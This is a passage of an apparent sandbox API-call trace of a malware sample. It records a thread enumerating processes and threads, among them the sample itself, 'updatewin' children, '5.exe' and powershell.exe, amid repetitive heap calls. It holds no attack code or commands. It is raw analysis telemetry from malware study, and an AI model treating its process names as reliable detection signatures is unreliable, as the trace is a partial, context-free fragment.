GetCurrentThreadId () returned 0x9e0 [0057.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.863] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp locked former.exe")) returned 1 [0057.864] GetTickCount () returned 0x11db2d9 [0057.864] GetCurrentThreadId () returned 0x9e0 [0057.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.864] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="drum_childrens_choose.exe")) returned 1 [0057.865] GetTickCount () returned 0x11db2d9 [0057.865] GetCurrentThreadId () returned 0x9e0 [0057.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.865] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cameras_efficient_about.exe")) returned 1 [0057.865] GetTickCount () returned 0x11db2d9 [0057.865] GetCurrentThreadId () returned 0x9e0 [0057.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.865] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="animated_min_rich.exe")) returned 1 [0057.866] GetTickCount () returned 0x11db2d9 [0057.866] GetCurrentThreadId () returned 0x9e0 [0057.866] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.866] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.866] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twenty-error.exe")) returned 1 [0057.867] GetTickCount () returned 0x11db2e8 [0057.867] GetCurrentThreadId () returned 0x9e0 [0057.867] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.867] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.867] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="proceeds.exe")) returned 1 [0057.868] GetTickCount () returned 0x11db2e8 [0057.868] GetCurrentThreadId () returned 0x9e0 [0057.868] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.868] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.868] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="violations.exe")) returned 1 [0057.869] GetTickCount () returned 0x11db2e8 [0057.869] GetCurrentThreadId () returned 0x9e0 [0057.869] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.869] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.869] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="way.exe")) returned 1 [0057.869] GetTickCount () returned 0x11db2e8 [0057.869] GetCurrentThreadId () returned 0x9e0 [0057.869] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.869] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.869] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0057.870] GetTickCount () returned 0x11db2e8 [0057.870] GetCurrentThreadId () returned 0x9e0 [0057.870] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.870] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.870] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x8f0, pcPriClassBase=13, dwFlags=0x0, szExeFile="penelop0611_2019-11-06_10-30.exe_.exe")) returned 1 [0057.871] GetTickCount () returned 0x11db2e8 [0057.871] GetCurrentThreadId () returned 0x9e0 [0057.871] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.871] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.871] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x938, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin.exe")) returned 1 [0057.872] GetTickCount () returned 0x11db2e8 [0057.872] GetCurrentThreadId () returned 0x9e0 [0057.872] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.872] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.872] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin1.exe")) returned 1 [0057.872] GetTickCount () returned 0x11db2e8 [0057.872] GetCurrentThreadId () returned 0x9e0 [0057.872] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.872] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.872] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x938, pcPriClassBase=8, dwFlags=0x0, szExeFile="5.exe")) returned 1 [0057.873] GetTickCount () returned 0x11db2e8 [0057.873] GetCurrentThreadId () returned 0x9e0 [0057.873] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.873] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.873] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xa14, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0057.874] GetTickCount () returned 0x11db2e8 [0057.874] GetCurrentThreadId () returned 0x9e0 [0057.874] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.874] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.874] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0057.875] GetTickCount () returned 0x11db2e8 [0057.875] GetCurrentThreadId () returned 0x9e0 [0057.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.875] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.875] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0057.875] GetTickCount () returned 0x11db2e8 [0057.875] GetCurrentThreadId () returned 0x9e0 [0057.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.875] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.875] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa74, pcPriClassBase=6, dwFlags=0x0, szExeFile="penelop0611_2019-11-06_10-30.exe_.exe")) returned 1 [0057.876] GetTickCount () returned 0x11db2e8 [0057.876] GetCurrentThreadId () returned 0x9e0 [0057.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.876] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa74, pcPriClassBase=6, dwFlags=0x0, szExeFile="penelop0611_2019-11-??????????????????????????????????")) returned 0 [0057.877] GetTickCount () returned 0x11db2e8 [0057.877] Thread32First (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.878] GetCurrentThreadId () returned 0x9e0 [0057.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.878] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.878] GetTickCount () returned 0x11db2e8 [0057.878] GetCurrentThreadId () returned 0x9e0 [0057.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.878] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.879] GetTickCount () returned 0x11db2e8 [0057.879] GetCurrentThreadId () returned 0x9e0 [0057.879] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.879] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.880] GetTickCount () returned 0x11db2e8 [0057.880] GetCurrentThreadId () returned 0x9e0 [0057.880] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.880] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.880] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.881] GetTickCount () returned 0x11db2e8 [0057.881] GetCurrentThreadId () returned 0x9e0 [0057.881] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.881] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.881] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.881] GetTickCount () returned 0x11db2e8 [0057.881] GetCurrentThreadId () returned 0x9e0 [0057.881] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.881] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.881] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.882] GetTickCount () returned 0x11db2f8 [0057.882] GetCurrentThreadId () returned 0x9e0 [0057.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.882] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.882] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.883] GetTickCount () returned 0x11db2f8 [0057.883] GetCurrentThreadId () returned 0x9e0 [0057.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.883] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.883] GetTickCount () returned 0x11db2f8 [0057.884] GetCurrentThreadId () returned 0x9e0 [0057.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.884] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.884] GetTickCount () returned 0x11db2f8 [0057.884] GetCurrentThreadId () returned 0x9e0 [0057.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.884] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.885] GetTickCount () returned 0x11db2f8 [0057.885] GetCurrentThreadId () returned 0x9e0 [0057.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.885] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.886] GetTickCount () returned 0x11db2f8 [0057.886] GetCurrentThreadId () returned 0x9e0 [0057.886] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.886] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.886] GetTickCount () returned 0x11db2f8 [0057.886] GetCurrentThreadId () returned 0x9e0 [0057.886] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.886] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.887] GetTickCount () returned 0x11db2f8 [0057.887] GetCurrentThreadId () returned 0x9e0 [0057.887] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.887] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.887] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.888] GetTickCount () returned 0x11db2f8 [0057.888] GetCurrentThreadId () returned 0x9e0 [0057.888] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.888] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.888] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.888] GetTickCount () returned 0x11db2f8 [0057.889] GetCurrentThreadId () returned 0x9e0 [0057.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.889] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.889] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.889] GetTickCount () returned 0x11db2f8 [0057.889] GetCurrentThreadId () returned 0x9e0 [0057.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.889] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.889] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.890] GetTickCount () returned 0x11db2f8 [0057.890] GetCurrentThreadId () returned 0x9e0 [0057.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.890] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.890] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.891] GetTickCount () returned 0x11db2f8 [0057.891] GetCurrentThreadId () returned 0x9e0 [0057.891] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.891] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.891] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.891] GetTickCount () returned 0x11db2f8 [0057.891] GetCurrentThreadId () returned 0x9e0 [0057.891] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.891] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.891] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.892] GetTickCount () returned 0x11db2f8 [0057.892] GetCurrentThreadId () returned 0x9e0 [0057.892] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.892] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.892] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.893] GetTickCount () returned 0x11db2f8 [0057.893] GetCurrentThreadId () returned 0x9e0 [0057.893] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.893] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.893] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.893] GetTickCount () returned 0x11db2f8 [0057.894] GetCurrentThreadId () returned 0x9e0 [0057.894] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.894] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.894] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.894] GetTickCount () returned 0x11db2f8 [0057.894] GetCurrentThreadId () returned 0x9e0 [0057.894] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.894] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.894] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.895] GetTickCount () returned 0x11db2f8 [0057.895] GetCurrentThreadId () returned 0x9e0 [0057.895] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.895] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.895] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.896] GetTickCount () returned 0x11db2f8 [0057.896] GetCurrentThreadId () returned 0x9e0 [0057.896] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.896] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.896] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.896] GetTickCount () returned 0x11db2f8 [0057.896] GetCurrentThreadId () returned 0x9e0 [0057.896] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.896] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.896] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.897] GetTickCount () returned 0x11db2f8 [0057.897] GetCurrentThreadId () returned 0x9e0 [0057.897] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.897] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.897] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.898] GetTickCount () returned 0x11db307 [0057.898] GetCurrentThreadId () returned 0x9e0 [0057.898] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.898] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.898] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.899] GetTickCount () returned 0x11db307 [0057.899] GetCurrentThreadId () returned 0x9e0 [0057.899] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.899] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.899] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.899] GetTickCount () returned 0x11db307 [0057.899] GetCurrentThreadId () returned 0x9e0 [0057.899] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.899] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.899] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.900] GetTickCount () returned 0x11db307 [0057.900] GetCurrentThreadId () returned 0x9e0 [0057.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.900] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.900] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.901] GetTickCount () returned 0x11db307 [0057.901] GetCurrentThreadId () returned 0x9e0 [0057.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.901] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.901] GetTickCount () returned 0x11db307 [0057.901] GetCurrentThreadId () returned 0x9e0 [0057.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.901] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.902] GetTickCount () returned 0x11db307 [0057.902] GetCurrentThreadId () returned 0x9e0 [0057.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.902] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.902] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.903] GetTickCount () returned 0x11db307 [0057.903] GetCurrentThreadId () returned 0x9e0 [0057.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.903] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.903] GetTickCount () returned 0x11db307 [0057.903] GetCurrentThreadId () returned 0x9e0 [0057.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.904] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.904] GetTickCount () returned 0x11db307 [0057.904] GetCurrentThreadId () returned 0x9e0 [0057.904] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.904] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.905] GetTickCount () returned 0x11db307 [0057.905] GetCurrentThreadId () returned 0x9e0 [0057.905] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.905] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.905] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.906] GetTickCount () returned 0x11db307 [0057.906] GetCurrentThreadId () returned 0x9e0 [0057.906] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.906] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.906] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.906] GetTickCount () returned 0x11db307 [0057.906] GetCurrentThreadId () returned 0x9e0 [0057.906] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.906] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.906] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.907] GetTickCount () returned 0x11db307 [0057.907] GetCurrentThreadId () returned 0x9e0 [0057.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 